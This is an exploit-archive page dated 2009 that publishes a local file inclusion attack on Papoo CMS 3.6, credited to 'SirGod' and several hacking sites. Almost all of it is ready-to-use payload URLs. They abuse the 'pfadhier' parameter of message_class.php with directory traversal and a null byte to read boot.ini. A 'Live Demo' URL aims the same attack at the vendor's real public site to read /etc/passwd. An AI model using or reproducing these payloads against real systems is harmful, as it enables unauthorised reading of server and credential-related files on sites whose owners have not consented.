[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Papoo CMS 3.x (pfadhier) Local File Inclusion Vulnerability
# Published : 2009-02-10
# Author : SirGod
# Previous Title : Thyme <= 1.3 (export_to) Local File Inclusion Vulnerability
# Next Title : q-news 2.0 Remote Command Execution Exploit


#########################################################################################################
[+] Papoo CMS 3.6 Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
#########################################################################################################

[+] Script Homepage : http://www.papoo-cms.com/

[+] Local File Inclusion

- PoC :

    http://127.0.0.1/[path]/lib/classes/message_class.php?pfadhier=[Local
File]%00

- Example :

     http://127.0.0.1/path/lib/classes/message_class.php?pfadhier=../../../../../../boot.ini%00

- Live Demo

     http://www.papoo-cms.com/lib/classes/message_class.php?pfadhier=../../../../../../etc/passwd%00

#########################################################################################################

# www.Syue.com [2009-02-10]